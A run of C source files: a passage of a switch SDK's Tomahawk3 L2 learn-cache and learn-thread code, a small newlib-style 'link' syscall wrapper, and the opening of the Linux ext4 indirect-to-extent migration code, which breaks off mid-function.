accordingly * Parameters: * unit(IN) - Device unit number * k(IN/OUT) - key items to search for. 
The AVL library updates other * fields of this structure, if key is found * found(OUT) - Set to true if item is found, else set to false * stn_move(OUT) - Set to true if station move condition is detected, * else set to false * Returns: * SOC_E_XXX * Notes: * None */ STATIC int _soc_th3_learn_do_lookup(int unit, soc_l2_lrn_avl_info_p k, int *found, int *stn_move) { int result; int port_tgid; int dest_type; /* Save port number obtained from hardware * Note AVL lookup overwrites 'k' completely, if the entry was found */ port_tgid = k->port_tgid; dest_type = k->dest_type; sal_mutex_take(SOC_CONTROL(unit)->l2x_lrn_shadow_mutex, sal_mutex_FOREVER); result = shr_avl_lookup(SOC_CONTROL(unit)->l2x_lrn_shadow, _soc_th3_learn_avl_compare_key, (shr_avl_datum_t *)k); sal_mutex_give(SOC_CONTROL(unit)->l2x_lrn_shadow_mutex); /* Check if a matching node was found in AVL tree. If so, check if the * entry has been added to L2 table in h/w. If so, then do nothing. * If not, the entry needs to be flagged for programming in h/w */ *found = FALSE; *stn_move = FALSE; if (result) { /* Entry found */ *found = TRUE; /* If entry is found, check for station move */ *stn_move = ((k->dest_type == dest_type) && (k->port_tgid == port_tgid)) ? FALSE : TRUE; } return SOC_E_NONE; } /* * Function: * _soc_th3_learn_cache_entry_process * Purpose: * This function processes each entry from the learn cache. It check if the * if the entry is present in learn shadow table. If entry is not found, it is * a new L2 flow, so its added programmed in to main L2 table. Learn cache * is updated after addition. * Parameters: * unit - Unit number of device * pipe - Pipe in which the entry was detected (range: 0-7) * entry - Learn cache entry from the pipe * index - Location of entry within the learn cache (range 0-15) * Returns: * SOC_E_XXX * Notes: * None */ STATIC int _soc_th3_learn_cache_entry_process(int unit, int pipe, l2_learn_cache_entry_t *entry, int entry_idx) { int rv; int found; int stn_move; soc_mem_t mem; soc_l2_lrn_avl_info_t k; int invalidated = FALSE; int curr_l2_table_entries; int max_l2_table_entries; int l2copyno; max_l2_table_entries = soc_mem_index_count(unit, L2Xm); l2copyno = SOC_MEM_BLOCK_ANY(unit, L2Xm); mem = SOC_MEM_UNIQUE_ACC(unit, L2_LEARN_CACHEm)[pipe]; sal_memset(&k, 0x0, sizeof(k)); soc_mem_mac_addr_get(unit, mem, entry, MAC_ADDRf, k.mac); k.vlan = soc_mem_field32_get(unit, mem, entry, VLAN_IDf); k.dest_type = soc_mem_field32_get(unit, mem, entry, DEST_TYPEf); k.port_tgid = soc_mem_field32_get(unit, mem, entry, DESTINATIONf); k.in_hw = FALSE; rv = _soc_th3_learn_do_lookup(unit, &k, &found, &stn_move); /* Check if learn interrupt needs to be disabled during processing below */ if (rv == SOC_E_NONE) { l2x_entry_t l2x_entry; soc_port_t port_tgid = 0; soc_field_t field = INVALIDf; if (SOC_CONTROL(unit)->lrn_cache_clr_on_rd) { /* Check if entry was added to h/w by previous learn cache entry */ /* Duplicate entries can result only in clear on read mode */ if (found == TRUE) { if (k.in_hw == TRUE) { /* In case of station move, L2X entry is already present in * h/w (in_hw is true); we should not invalidate the first * learn cache entry here (for station move), without * checking station move condition (station move is handled * later in this function) */ if (stn_move == FALSE) { /* Entry cleared by h/w in clr-on-rd mode, so we do not * explicitly invalidate the entry here */ /* SOC_IF_ERROR_RETURN( soc_th3_l2_lrn_cache_entry_invalidate(unit, pipe, entry_idx)); */ LOG_INFO(BSL_LS_SOC_L2, (BSL_META_U(unit, "Duplicate 
lrn cache entry:" " pipe %d, index %d\n"), pipe, entry_idx)); return rv; } } else { /* If k.in_hw is FALSE, it means h/w was * updated, but software table entry was not, which should * never happen. It may point to software table corruption, * or a problem arising out of table write sequence. * Tables should always be in sync */ LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "%s: S/w" " entry %d, in pipe %d out of sync with" " h/w\n"), __FUNCTION__, entry_idx, pipe)); return SOC_E_INTERNAL; } } } sal_memset(&l2x_entry, 0, sizeof(l2x_entry)); soc_L2Xm_field32_set(unit, &l2x_entry, BASE_VALIDf, 0x1); soc_L2Xm_field32_set(unit, &l2x_entry, VLAN_IDf, k.vlan); soc_L2Xm_mac_addr_set(unit, &l2x_entry, MAC_ADDRf, k.mac); soc_L2Xm_field32_set(unit, &l2x_entry, KEY_TYPEf, TH3_L2_HASH_KEY_TYPE_BRIDGE); if (k.dest_type) { soc_L2Xm_field32_set(unit, &l2x_entry, Tf, 0x1); } if (found == FALSE) { /* Replace original port with new port */ field = k.dest_type ? TGIDf : PORT_NUMf; soc_L2Xm_field32_set(unit, &l2x_entry, field, k.port_tgid); soc_L2Xm_field32_set(unit, &l2x_entry, HITSAf, 1); /* Insert L2 entry in h/w */ soc_mem_lock(unit, L2Xm); curr_l2_table_entries = SOP_MEM_STATE(unit, L2Xm).count[l2copyno]; /* If there is no space in the L2 table, do not issue insert. Note * that current L2 table size is dynamically changing; entries can * be added/deleted though other sources like application thread * (using L2 APIs), cmd shell, other internal SDK modules and so on. * So the current table enttries is only a tentative (but closer to * accurate) value */ rv = SOC_E_NONE; if ((curr_l2_table_entries >= 0) && (curr_l2_table_entries < max_l2_table_entries)) { rv = soc_mem_insert(unit, L2Xm, MEM_BLOCK_ALL, &l2x_entry); } soc_mem_unlock(unit, L2Xm); /* AVL tree will be updated through soc_th3_l2x_shadow_callback */ if ((rv == SOC_E_FULL) || (rv == SOC_E_EXISTS) || (rv == SOC_E_NOT_FOUND)) { /* If full, exist or not found conditions are encountered, we * simply log an error. If we return error, learn thread will * exit. We don't want the thread to exit based on certain * 'conditions', or search result, since it will stop learning * altogether. Full condition can get cleared later on by aging, * deletions by application(s), or by s/w replace operation. */ LOG_INFO(BSL_LS_SOC_L2, (BSL_META_U(unit, "%s: soc_mem_insert retval %d\n"), __FUNCTION__, rv)); rv = SOC_E_NONE; } else { if (SOC_FAILURE(rv)) { return rv; } } /* Clear entry in learn cache only if clr on rd is not enabled */ if (!(SOC_CONTROL(unit)->lrn_cache_clr_on_rd)) { SOC_IF_ERROR_RETURN(soc_th3_l2_lrn_cache_entry_invalidate(unit, pipe, entry_idx)); } invalidated = TRUE; } /* Handle station move */ if ((stn_move == TRUE) && (found == TRUE)) { soc_mem_lock(unit, L2Xm); rv = soc_mem_delete(unit, L2Xm, MEM_BLOCK_ALL, &l2x_entry); if (SOC_FAILURE(rv)) { soc_mem_unlock(unit, L2Xm); if (rv == SOC_E_NOT_FOUND) { /* If entry is not found, log an error. Do not return this * error code since it is not a critical/fatal error. 
If * same error code is returned, the learn thread will exit * and learning will stop */ LOG_INFO(BSL_LS_SOC_L2, (BSL_META_U(unit, "%s: soc_mem_delete" " retval %d\n"), __FUNCTION__, rv)); rv = SOC_E_NONE; } return rv; } /* Replace original port with new port */ port_tgid = soc_mem_field32_get(unit, mem, entry, DESTINATIONf); /* k.dest_type, k.port_tgid are overwritten by * _soc_th3_learn_do_lookup, so we get k.dest_type from learn cache * again (k.port_tgid is not used here though) */ k.dest_type = soc_mem_field32_get(unit, mem, entry, DEST_TYPEf); field = k.dest_type ? TGIDf : PORT_NUMf; if (k.dest_type) { soc_L2Xm_field32_set(unit, &l2x_entry, Tf, 0x1); } else { soc_L2Xm_field32_set(unit, &l2x_entry, Tf, 0x0); } soc_L2Xm_field32_set(unit, &l2x_entry, field, port_tgid); soc_L2Xm_field32_set(unit, &l2x_entry, HITSAf, 1); rv = soc_mem_insert(unit, L2Xm, MEM_BLOCK_ALL, &l2x_entry); soc_mem_unlock(unit, L2Xm); if ((rv == SOC_E_FULL) || (rv == SOC_E_EXISTS) || (rv == SOC_E_NOT_FOUND)) { /* If full, exist or not found conditions are encountered, we * simply log an error. If we return error, learn thread will * exit. We don't want the thread to exit based on certain * 'conditions', or search result, since it will stop learning * altogether. Full condition can get cleared later on by aging, * deletions by application(s), or by s/w replace operation. */ LOG_INFO(BSL_LS_SOC_L2, (BSL_META_U(unit, "%s: soc_mem_insert retval %d\n"), __FUNCTION__, rv)); rv = SOC_E_NONE; } else { if (SOC_FAILURE(rv)) { return rv; } } /* AVL tree will be updated through soc_th3_l2x_shadow_callback */ /* Clear entry in learn cache only if clr on rd is not enabled */ if (!(SOC_CONTROL(unit)->lrn_cache_clr_on_rd)) { SOC_IF_ERROR_RETURN(soc_th3_l2_lrn_cache_entry_invalidate(unit, pipe, entry_idx)); } invalidated = TRUE; } } /* This case should not happen, added here as a precaution to avoid * full condition for learn cache due to unprocessed entries (if * this condition is reached, it means the entry was not processed * earlier) */ if (invalidated == FALSE) { LOG_INFO(BSL_LS_SOC_L2, (BSL_META_U(unit, "%s: Entry %d in pipe %d not processed," " removing it from lrn cache\n"), __FUNCTION__, entry_idx, pipe)); SOC_IF_ERROR_RETURN(soc_th3_l2_lrn_cache_entry_invalidate(unit, pipe, entry_idx)); } return rv; } /* * Function: * _soc_th3_lrn_cache_intr_configure * Purpose: * This function is used to enable or disable L2 learn cache interrupt * generation * Parameters: * unit - SOC unit # * bit - Bit number corresponding to a pipe. Bit 8 is for pipe 0 and * bit 15 is for pipe 7. See Notes. * enable - To enable interrupt, use 1 or a non-zero value. * To disable interrupt, use 0. * Returns: * SOC_E_XXX * Notes: * This function uses hard-coded values for interrupt numbers/bit positions. 
* Also it assumes fixed number of bits (1 per pipe), contiguous numbering, * and fixed bit positions for each pipe; so it is not portable */ STATIC int _soc_th3_lrn_cache_intr_configure(int unit, int bit, int enable) { int rv = SOC_E_NONE; uint32 regval = 0; soc_reg_t reg = ICFG_CHIP_LP_INTR_ENABLE_REG1r; /* Accept only bits 8-15 (both numbers included) */ if ((bit < 8) || (bit > 15)) { return SOC_E_INTERNAL; } rv = soc_iproc_getreg(unit, soc_reg_addr(unit, reg, REG_PORT_ANY, 0), &regval); if (rv == SOC_E_NONE) { if (enable) { regval |= 1 << bit; } else { regval &= ~(1 << bit); } rv = soc_iproc_setreg(unit, soc_reg_addr(unit, reg, REG_PORT_ANY, 0), regval); } return rv; } /* * Function: * soc_th3_lrn_cache_intr_handler * Purpose: * Interrupt handler for (per-pipe) learn cache (fifo) interrupt * Parameters: * unit - SOC unit # * data - Data used by the isr, initialized during interrupt registration * Returns: * Nothing */ void soc_th3_lrn_cache_intr_handler(int unit, void *data) { soc_control_t *soc = SOC_CONTROL(unit); int i; if (soc->l2x_lrn_mode == L2_LRN_MODE_INTR) { /* Disable learn cache interrupts from all pipes */ for (i = 8; i <= 15; i++) { (void)_soc_th3_lrn_cache_intr_configure(unit, i, 0); } /* Signal lrn thread of learn event(s) */ sal_sem_give(soc->arl_notify); } /* If we see interrupt in polled mode, then there is some misconfiguration. * In this case, check L2_LEARN_COPY_CACHE_CTRL's interrupt control bit */ return; } /* * Function: * soc_th3_l2_learn_alloc_resources * Purpose: * This function is used to create learn shadow table memory and mutex for * safe access to the shadow table. It is called during L2 initialization * Parameters: * u - Pointer to unit number * Returns: * SOC_E_NONE on success * Other SOC_E_* codes on error */ int soc_th3_l2_learn_alloc_resources(int unit) { /* Create AVL table and semaphore used for L2 learning */ if (SOC_CONTROL(unit)->l2x_lrn_shadow != NULL) { if (shr_avl_destroy(SOC_CONTROL(unit)->l2x_lrn_shadow) < 0) { LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "%d: Error calling shr_avl_destroy\n"), unit)); return SOC_E_INTERNAL; } SOC_CONTROL(unit)->l2x_lrn_shadow = NULL; } if (shr_avl_create(&SOC_CONTROL(unit)->l2x_lrn_shadow, INT_TO_PTR(unit), sizeof(soc_l2_lrn_avl_info_t), _SOC_TH3_L2_LRN_TBL_SIZE) < 0) { LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "%d: Error calling shr_avl_create\n"), unit)); return SOC_E_MEMORY; } if ((SOC_CONTROL(unit)->l2x_lrn_shadow_mutex = sal_mutex_create("L2AvlMutex")) == NULL) { if (SOC_CONTROL(unit)->l2x_lrn_shadow != NULL) { shr_avl_destroy(SOC_CONTROL(unit)->l2x_lrn_shadow); SOC_CONTROL(unit)->l2x_lrn_shadow = NULL; } LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "%d: Error calling sal_mutex_create for" " L2 AVL Mutex\n"), unit)); return SOC_E_MEMORY; } LOG_INFO(BSL_LS_SOC_L2, (BSL_META_U(unit, "%d: %s: Created" " shadow table and mutex\n"), unit, __FUNCTION__)); return SOC_E_NONE; } /* * Function: * _soc_th3_l2_learn_process * Purpose: * This function is the main handler for learn thread. It will be used by * learn thread during learning. 
It will read learn cache entries, perform * look-ups in shadow (AVL) table during station move, and write to it * after an L2 entry is learned * Parameters: * u - Pointer to unit number * Returns: * Nothing */ STATIC void _soc_th3_l2_learn_process(void *u) { int unit = PTR_TO_INT(u); soc_control_t *soc = SOC_CONTROL(unit); int interval; void *buffer; uint32 index_min; int count; int num_bytes; int rv; int pipe; soc_mem_t mem; int i; int valid; LOG_INFO(BSL_LS_SOC_L2, (BSL_META_U(unit, "%d: In _soc_th3_l2_learn_process\n"), unit)); mem = SOC_MEM_UNIQUE_ACC(unit, L2_LEARN_CACHEm)[0]; num_bytes = soc_mem_entry_bytes(unit, mem); count = soc_mem_index_count(unit, mem); index_min = soc_mem_index_min(unit, mem); buffer = soc_cm_salloc(unit, num_bytes * count, "L2_LEARN_CACHEm"); if (buffer == NULL) { soc_event_generate(unit, SOC_SWITCH_EVENT_THREAD_ERROR, SOC_SWITCH_EVENT_THREAD_L2X_LEARN, __LINE__, SOC_E_MEMORY); goto cleanup_exit; } if (soc->l2x_lrn_mode == L2_LRN_MODE_INTR) { /* Enable learn cache interrupts for all pipes */ for (i = 8; i <= 15; i++) { (void)_soc_th3_lrn_cache_intr_configure(unit, i, 1); } } while((interval = soc->l2x_learn_interval)) { uint32 sts_reg = 0; uint32 en_reg = 0; uint32 mask = 0; uint32 poll_all_pipes = 1; if (soc->l2x_lrn_mode == L2_LRN_MODE_INTR) { soc_reg_t reg = INVALIDr; uint32 shift = 0; sal_sem_take(soc->arl_notify, interval); /* * We read the interrupt status here, and process the pipes whose * learn cache has reached or exceeded threshold. While processing, * if other pipes raise interrupts, we will process them in the * next cycle */ reg = ICFG_CHIP_LP_INTR_RAW_STATUS_REG1r; rv = soc_iproc_getreg(unit, soc_reg_addr(unit, reg, REG_PORT_ANY, 0), &sts_reg); if (SOC_SUCCESS(rv)) { reg = ICFG_CHIP_LP_INTR_ENABLE_REG1r; rv = soc_iproc_getreg(unit, soc_reg_addr(unit, reg, REG_PORT_ANY, 0), &en_reg); } if (SOC_FAILURE(rv)) { LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "Failed to read register" " %s, rv = %d\n"), SOC_REG_NAME(unit, reg), rv)); goto cleanup_exit; } shift = 8; /* L2 learn interrupt bits start at bit 8 */ /* Create mask to pick the set of learning bits */ mask = (1U << NUM_PIPE(unit)) - 1; mask <<= shift; /* Clear out intr bits other than those that are for learning */ en_reg &= mask; sts_reg &= mask; /* Select intr bits which are currently disabled by the isr * (soc_th3_lrn_cache_intr_handler), since those are the ones that * need to be serviced. (Note currently we reset all bits in the * isr to simplify interrupt processing) */ sts_reg &= ~en_reg; sts_reg >>= shift; /* Process all pipes if there was no interrupt during learn * interval. This way we handle pipes which have entries, but the * threshold has not reached, so the interrupt is not generated * (for those pipes) */ poll_all_pipes = !sts_reg ? 1 : 0; } /* The system is in warmboot phase. We do not do any learn processing * until we are out of warmboot */ if (SOC_WARM_BOOT(unit)) { goto skip_processing; } for (pipe = 0; pipe < NUM_PIPE(unit); pipe++) { int full_cleared; int thr_cleared; /* Number of valid learn cache entries processed successfully */ int processed_cnt; soc_info_t *si = &SOC_INFO(unit); /* For half-pipe configuration, this check has been added */ if (SOC_PBMP_IS_NULL(si->pipe_pbm[pipe])) { continue; } /* The system is in warmboot phase. 
We do not do any learn * processing until we are out of warmboot */ if (SOC_WARM_BOOT(unit)) { goto skip_processing; } full_cleared = FALSE; thr_cleared = FALSE; /* Count the number of valid entries processed, and use it to * compare to threshold value */ processed_cnt = 0; if (soc->l2x_lrn_mode == L2_LRN_MODE_INTR) { /* sts_reg has bits set for pipes whose caches need * to be processed * If we are not polling all pipes, then we should check * individual bits in the sts_reg bitmap (corresponding to each * pipe), and process entries in that pipe (interrupt was * asserted for pipes in sts_reg bitmap) */ /* If we shouldn't process all pipes, then specific pipes in the * bitmap are the ones which need to be serviced */ if ((!poll_all_pipes) && (!(sts_reg & (1U << pipe)))) { continue; } } /* Read cache entries for the specified pipe */ rv = soc_th3_l2_learn_cache_read(unit, pipe, buffer); if (SOC_FAILURE(rv)) { soc_event_generate(unit, SOC_SWITCH_EVENT_THREAD_ERROR, SOC_SWITCH_EVENT_THREAD_L2X_LEARN, __LINE__, rv); goto cleanup_exit; } /* Process each learn cache entry */ for (i = index_min; i < (index_min + count); i++) { l2_learn_cache_entry_t *entry; if (!soc->l2x_learn_interval) { goto cleanup_exit; } /* The system is in warmboot phase. We do not do any learn * processing until we are out of warmboot */ if (SOC_WARM_BOOT(unit)) { goto skip_processing; } /* Point to the next entry in the buffer */ entry = (l2_learn_cache_entry_t *)((uint8 *)buffer + i * num_bytes); mem = SOC_MEM_UNIQUE_ACC(unit, L2_LEARN_CACHEm)[pipe]; valid = soc_mem_field32_get(unit, mem, entry, VALIDf); /* Process valid entries only */ if (valid) { LOG_DEBUG(BSL_LS_SOC_L2, (BSL_META_U(unit, "%s: Valid entry in pipe %d, index %d\n"), __FUNCTION__, pipe, i)); rv = _soc_th3_learn_cache_entry_process(unit, pipe, entry, i); if (SOC_FAILURE(rv)) { /* In case of failure, we do not exit the thread, since * learning will stop altogether. Assumption is that * the error may be transitory in nature */ LOG_INFO(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "Failed to add entry" " in pipe %d, index %d, rv = %d\n"), pipe, i, rv)); continue; } if (soc->l2x_lrn_mode == L2_LRN_MODE_INTR) { processed_cnt++; /* Check if cache full condition exists. If so, clear * it only once in this processing cycle, for each pipe, * after 1st entry is processed. (If cache fills again, * we will handle it in the next interrupt handling * cycle) */ if (full_cleared == FALSE) { soc_field_t fld = L2_LEARN_CACHE_FULLf; rv = _soc_th3_l2_learn_cache_status_check_clear( unit, pipe, &fld, 1); if (SOC_FAILURE(rv)) { LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "Cache full bit" " could not be cleared in pipe %d," " index %d, rv = %d\n"), pipe, i, rv)); goto cleanup_exit; } full_cleared = TRUE; } if (thr_cleared == FALSE) { /* Clear thresold exceeded bit if number of valid * entries processed crossed the programmed * threshold value. If the threshold is set to 1, * we have already processed the entry, so we * immediately clear threshold bit */ if ((processed_cnt > soc->lrn_cache_threshold) || (soc->lrn_cache_threshold == 1)) { soc_field_t fld = L2_LEARN_CACHE_THRESHOLD_EXCEEDEDf; rv = _soc_th3_l2_learn_cache_status_check_clear( unit, pipe, &fld, 1); if (SOC_FAILURE(rv)) { LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "Threshold exc. 
bit" " could not be cleared in pipe %d," " index %d, rv = %d\n"), pipe, i, rv)); goto cleanup_exit; } thr_cleared = TRUE; } } } } } } skip_processing: if (soc->l2x_lrn_mode == L2_LRN_MODE_INTR) { /* Enable learn cache interrupts for all pipes */ for (i = 8; i <= 15; i++) { (void)_soc_th3_lrn_cache_intr_configure(unit, i, 1); } } else { sal_usleep(interval); } } cleanup_exit: /* Check if this is required if (SOC_CONTROL(unit)->l2x_lrn_shadow != NULL) { shr_avl_destroy(SOC_CONTROL(unit)->l2x_lrn_shadow); SOC_CONTROL(unit)->l2x_lrn_shadow = NULL; } if (SOC_CONTROL(unit)->l2x_lrn_shadow_mutex != NULL) { sal_mutex_destroy(SOC_CONTROL(unit)->l2x_lrn_shadow_mutex); SOC_CONTROL(unit)->l2x_lrn_shadow_mutex = NULL; } */ if (buffer != NULL) { soc_cm_sfree(unit, buffer); } soc->l2x_learn_pid = SAL_THREAD_ERROR; sal_thread_exit(0); } /* * Function: * soc_th3_l2_learn_start * Purpose: * Start l2 learn thread * Parameters: * unit - unit number. * Returns: * SOC_E_XXX * Notes: * soc_th3_l2_learn_alloc_resources must be called before calling this function * for the _first_ time */ int soc_th3_l2_learn_thread_start(int unit, int interval) { soc_control_t *soc = SOC_CONTROL(unit); uint32 reg_val = 0; int pri = SOC_TH3_LRN_THREAD_PRI_DEFAULT; if (soc->l2x_learn_interval != 0) { SOC_IF_ERROR_RETURN(soc_th3_l2_learn_thread_stop(unit)); } SOC_CONTROL_LOCK(unit); sal_snprintf(soc->l2x_learn_name, sizeof (soc->l2x_age_name), "L2Lrn.%d", unit); if (soc->l2x_learn_pid == SAL_THREAD_ERROR) { soc_th3_l2x_lrn_mode_t mode; soc_cm_get_id(unit, &dev_id, &rev_id); if (soc_property_get(unit, spn_L2XLRN_INTR_EN, SOC_TH3_LRN_CACHE_INTR_CTL_DEFAULT)) { mode = L2_LRN_MODE_INTR; } else { mode = L2_LRN_MODE_POLL; } /* Always polled mode for simulation */ if (SAL_BOOT_BCMSIM) { mode = L2_LRN_MODE_POLL; } soc->l2x_lrn_mode = mode; /* Do not use clear-on-read by default, unless user wants it */ soc->lrn_cache_clr_on_rd = soc_property_get(unit, spn_L2XLRN_CLEAR_ON_READ, SOC_TH3_LRN_CACHE_CLR_ON_RD_DEFAULT); soc->l2x_learn_interval = interval; if (interval == 0) { SOC_CONTROL_UNLOCK(unit); return SOC_E_NONE; } /* Set initial values for learn cache operation */ SOC_IF_ERROR_RETURN(READ_L2_LEARN_COPY_CACHE_CTRLr(unit, &reg_val)); soc_reg_field_set(unit, L2_LEARN_COPY_CACHE_CTRLr, &reg_val, L2_LEARN_CACHE_ENf, 0x1); soc_reg_field_set(unit, L2_LEARN_COPY_CACHE_CTRLr, &reg_val, CLEAR_ON_READ_ENf, (uint32)(soc->lrn_cache_clr_on_rd)); if (soc->l2x_lrn_mode == L2_LRN_MODE_INTR) { /* * 1. Set default interrupt threshold (from soc property, or soc) * 2. Mark all cache entries as 'invalid' - done below this 'if' * 3. Enable l2 learn cache interrupt. */ soc->lrn_cache_threshold = soc_property_get(unit, spn_L2XLRN_INTR_THRESHOLD, SOC_TH3_LRN_CACHE_THRESHOLD_DEFAULT); /* A value of 0 or less is illegal. Also a value above 16 is * illegal, flag error */ if ((soc->lrn_cache_threshold <= 0) || (soc->lrn_cache_threshold > 16)) { LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "soc_th3_l2_learn_start: Illegal value of intr" " threshold: %d\n"), soc->lrn_cache_threshold)); return SOC_E_CONFIG; } /* By default, generate interrupt only when # cache entries equals * the programmed threshold value. 
For generating interrupt on each * learn event, user may set spn_L2XLRN_INTR_THRESHOLD to 1 */ soc->lrn_cache_intr_ctl = 0x0; soc_reg_field_set(unit, L2_LEARN_COPY_CACHE_CTRLr, &reg_val, CACHE_INTERRUPT_CTRLf, (uint32)(soc->lrn_cache_intr_ctl)); soc_reg_field_set(unit, L2_LEARN_COPY_CACHE_CTRLr, &reg_val, CACHE_INTERRUPT_THRESHOLDf, (uint32)(soc->lrn_cache_threshold)); } else { soc->lrn_cache_intr_ctl = 0x0; /* In polled mode, set these fields to reset values */ soc_reg_field_set(unit, L2_LEARN_COPY_CACHE_CTRLr, &reg_val, CACHE_INTERRUPT_CTRLf, (uint32)(soc->lrn_cache_intr_ctl)); soc_reg_field_set(unit, L2_LEARN_COPY_CACHE_CTRLr, &reg_val, CACHE_INTERRUPT_THRESHOLDf, 0x8); } SOC_IF_ERROR_RETURN(WRITE_L2_LEARN_COPY_CACHE_CTRLr(unit, reg_val)); /* Clear all entries of L2 learn cache */ SOC_IF_ERROR_RETURN(soc_th3_l2_learn_cache_clear(unit)); /* Reset cache status bits */ SOC_IF_ERROR_RETURN(soc_th3_l2_learn_cache_status_clear(unit)); pri = soc_property_get(unit, spn_L2XLRN_THREAD_PRI, SOC_TH3_LRN_THREAD_PRI_DEFAULT); /* Make sure that learn cache interrupt is enabled in CMICx, * later in the main initialization sequence */ soc->l2x_learn_pid = sal_thread_create(soc->l2x_learn_name, SAL_THREAD_STKSZ, pri, _soc_th3_l2_learn_process, INT_TO_PTR(unit)); if (soc->l2x_learn_pid == SAL_THREAD_ERROR) { LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "soc_th3_l2_learn_start: Could not start L2 learn" " thread\n"))); SOC_CONTROL_UNLOCK(unit); return SOC_E_MEMORY; } } SOC_CONTROL_UNLOCK(unit); /* More programming might be reqd depending on learn cache en/dis setting */ return SOC_E_NONE; } int soc_th3_l2_learn_thread_stop(int unit) { soc_control_t *soc = SOC_CONTROL(unit); int rv = SOC_E_NONE; soc_timeout_t to; sal_usecs_t interval; LOG_INFO(BSL_LS_SOC_ARL, (BSL_META_U(unit, "Stopping learn" " thread: unit=%d\n"), unit)); /* Save interval to wait for thread to wake up again */ if (SAL_BOOT_SIMULATION) { /* Allow more time on simulation, similar to other devices */ interval = 30 * 1000000; } else { interval = 10 * 1000000; } SOC_CONTROL_LOCK(unit); soc->l2x_learn_interval = 0; /* Request exit */ SOC_CONTROL_UNLOCK(unit); if (soc->l2x_learn_pid != SAL_THREAD_ERROR) { if (soc->l2x_lrn_mode == L2_LRN_MODE_INTR) { int i; /* Disable learn cache interrupts from all pipes */ for (i = 8; i <= 15; i++) { (void)_soc_th3_lrn_cache_intr_configure(unit, i, 0); } } /* Wake up thread so it will check the exit flag */ /*sal_sem_give(soc->arl_notify); Check if notification to learn thread is required */ /* Give thread a few seconds to wake up and exit */ soc_timeout_init(&to, interval, 0); LOG_INFO(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "Learn thread stop: Wait may be longer if" " cfg polling interval is high, cfg interval = %u\n"), interval)); while (soc->l2x_learn_pid != SAL_THREAD_ERROR) { if (soc_timeout_check(&to)) { LOG_ERROR(BSL_LS_SOC_L2, (BSL_META_U(unit, "Learn thread did not stop\n"))); rv = SOC_E_INTERNAL; break; } } } return (rv); } int soc_th3_l2_learn_thread_running(int unit, sal_usecs_t* interval) { soc_control_t *soc = SOC_CONTROL(unit); if (soc->l2x_learn_pid != SAL_THREAD_ERROR) { if (interval != NULL) { *interval = soc->l2x_learn_interval; } } return(soc->l2x_learn_pid != SAL_THREAD_ERROR); } #endif /* BCM_XGS_SWITCH_SUPPORT */ #endif /* BCM_TOMAHAWK3_SUPPORT */
783216.c
/* connector for link */ #include <reent.h> int _DEFUN (link, (old, new), char *old _AND char *new) { #ifdef REENTRANT_SYSCALLS_PROVIDED return _link_r (_REENT, old, new); #else return _link (old, new); #endif }
93772.c
/* * Copyright IBM Corporation, 2007 * Author Aneesh Kumar K.V <aneesh.kumar@linux.vnet.ibm.com> * * This program is free software; you can redistribute it and/or modify it * under the terms of version 2.1 of the GNU Lesser General Public License * as published by the Free Software Foundation. * * This program is distributed in the hope that it would be useful, but * WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. * */ #include <linux/module.h> #include <linux/slab.h> #include "ext4_jbd2.h" #include "ext4_extents.h" /* * The contiguous blocks details which can be * represented by a single extent */ struct list_blocks_struct { ext4_lblk_t first_block, last_block; ext4_fsblk_t first_pblock, last_pblock; }; static int finish_range(handle_t *handle, struct inode *inode, struct list_blocks_struct *lb) { int retval = 0, needed; struct ext4_extent newext; struct ext4_ext_path *path; if (lb->first_pblock == 0) return 0; /* Add the extent to temp inode*/ newext.ee_block = cpu_to_le32(lb->first_block); newext.ee_len = cpu_to_le16(lb->last_block - lb->first_block + 1); ext4_ext_store_pblock(&newext, lb->first_pblock); path = ext4_ext_find_extent(inode, lb->first_block, NULL); if (IS_ERR(path)) { retval = PTR_ERR(path); path = NULL; goto err_out; } /* * Calculate the credit needed to inserting this extent * Since we are doing this in loop we may accumalate extra * credit. But below we try to not accumalate too much * of them by restarting the journal. */ needed = ext4_ext_calc_credits_for_single_extent(inode, lb->last_block - lb->first_block + 1, path); /* * Make sure the credit we accumalated is not really high */ if (needed && ext4_handle_has_enough_credits(handle, EXT4_RESERVE_TRANS_BLOCKS)) { retval = ext4_journal_restart(handle, needed); if (retval) goto err_out; } else if (needed) { retval = ext4_journal_extend(handle, needed); if (retval) { /* * IF not able to extend the journal restart the journal */ retval = ext4_journal_restart(handle, needed); if (retval) goto err_out; } } retval = ext4_ext_insert_extent(handle, inode, path, &newext, 0); err_out: if (path) { ext4_ext_drop_refs(path); kfree(path); } lb->first_pblock = 0; return retval; } static int update_extent_range(handle_t *handle, struct inode *inode, ext4_fsblk_t pblock, ext4_lblk_t blk_num, struct list_blocks_struct *lb) { int retval; /* * See if we can add on to the existing range (if it exists) */ if (lb->first_pblock && (lb->last_pblock+1 == pblock) && (lb->last_block+1 == blk_num)) { lb->last_pblock = pblock; lb->last_block = blk_num; return 0; } /* * Start a new range. 
*/ retval = finish_range(handle, inode, lb); lb->first_pblock = lb->last_pblock = pblock; lb->first_block = lb->last_block = blk_num; return retval; } static int update_ind_extent_range(handle_t *handle, struct inode *inode, ext4_fsblk_t pblock, ext4_lblk_t *blk_nump, struct list_blocks_struct *lb) { struct buffer_head *bh; __le32 *i_data; int i, retval = 0; ext4_lblk_t blk_count = *blk_nump; unsigned long max_entries = inode->i_sb->s_blocksize >> 2; if (!pblock) { /* Only update the file block number */ *blk_nump += max_entries; return 0; } bh = sb_bread(inode->i_sb, pblock); if (!bh) return -EIO; i_data = (__le32 *)bh->b_data; for (i = 0; i < max_entries; i++, blk_count++) { if (i_data[i]) { retval = update_extent_range(handle, inode, le32_to_cpu(i_data[i]), blk_count, lb); if (retval) break; } } /* Update the file block number */ *blk_nump = blk_count; put_bh(bh); return retval; } static int update_dind_extent_range(handle_t *handle, struct inode *inode, ext4_fsblk_t pblock, ext4_lblk_t *blk_nump, 